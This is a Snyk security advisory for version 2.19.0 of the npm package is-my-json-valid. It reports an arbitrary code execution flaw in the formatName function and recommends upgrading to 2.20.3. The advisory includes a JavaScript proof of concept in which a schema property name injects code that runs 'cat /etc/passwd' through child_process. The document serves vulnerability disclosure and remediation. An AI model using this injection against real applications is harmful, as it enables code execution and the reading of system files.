Package Name: is-my-json-valid
Package Version: ['2.19.0']
Package Manager: npm
Target File: package.json
Severity Level: high
Snyk ID: SNYK-JS-ISMYJSONVALID-597167
Snyk CVE: No CVE
Snyk CWE: CWE-94
Link to issue in Snyk: https://app.snyk.io/org/cse_rhicksiii91/project/14f822de-b806-4bd7-9ad2-767a7feebe1d
Snyk Description:

## Overview

is-my-json-valid is a JSONSchema / orderly validator that uses code generation to be extremely fast.

Affected versions of this package are vulnerable to Arbitrary Code Execution via the `formatName` function.

## PoC

```js
const validator = require('is-my-json-valid');

const schema = {
  type: 'object',
  properties: {
    // The property name itself carries the injected expression.
    'x[console.log(process.mainModule.require(`child_process`).execSync(`cat /etc/passwd`).toString(`utf-8`))]': {
      required: true,
      type: 'string'
    }
  }
};

// Compiling the schema generates the validator code.
var validate = validator(schema);
validate({});
```

## Remediation

Upgrade `is-my-json-valid` to version 2.20.3 or higher.